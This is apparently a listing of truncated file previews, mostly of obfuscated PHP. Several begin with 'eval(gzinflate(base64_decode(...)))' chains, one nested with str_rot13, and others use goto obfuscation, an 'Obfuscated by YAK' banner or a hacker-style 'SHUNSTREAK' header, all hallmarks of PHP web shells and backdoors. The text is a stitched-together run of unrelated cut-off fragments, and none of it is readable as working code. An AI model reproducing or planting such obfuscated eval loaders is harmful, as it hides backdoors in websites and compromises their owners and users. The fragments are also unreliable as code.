%eo- %88r- <?php goto B5; a1: $A0 = E9($A0); goto Cc;... <?php goto PbqcS; oA1jF: preg_match("\57\134\57\x28\133\x5e\134\57\135\x2b\x5c\x2e\160\x... <?php //ICB0 81:0 82:5603 ?><?php //00... <?php /** * Egyptian Mythology | OSIRIS | SET | ANUBIS | HORUS * Powered By SHUNSTREAK ... <?php /* __________________________________________________ | Obfuscated by YAK P... <?php eval('eval(gzinflate(base64_decode("HZnHDupYGoTfpVfd8sI5qTUL55yzNyNHnHFOTz/cgQ0CG4... "use strict";this.default_gsi=this.default_gsi||{};(function(_){var window=this; try{ _.... <?php eval(gzinflate(base64_decode("FZdFssVKkkT3UqP/TQMxWVsPxMysSZsYr5hX369WkJlSxPHj1ZW... <?php eval(gzinflate(base64_decode("FZm1DuxaFkT/5UX3yoGZ9DSBmZmdjMzMbeqvn560JUtnU9UqdXVl45... <?php eval(gzinflate(base64_decode(base64_decode(str_rot13("IybmMTccqxkdpUuzAIqQqIc1AURirI...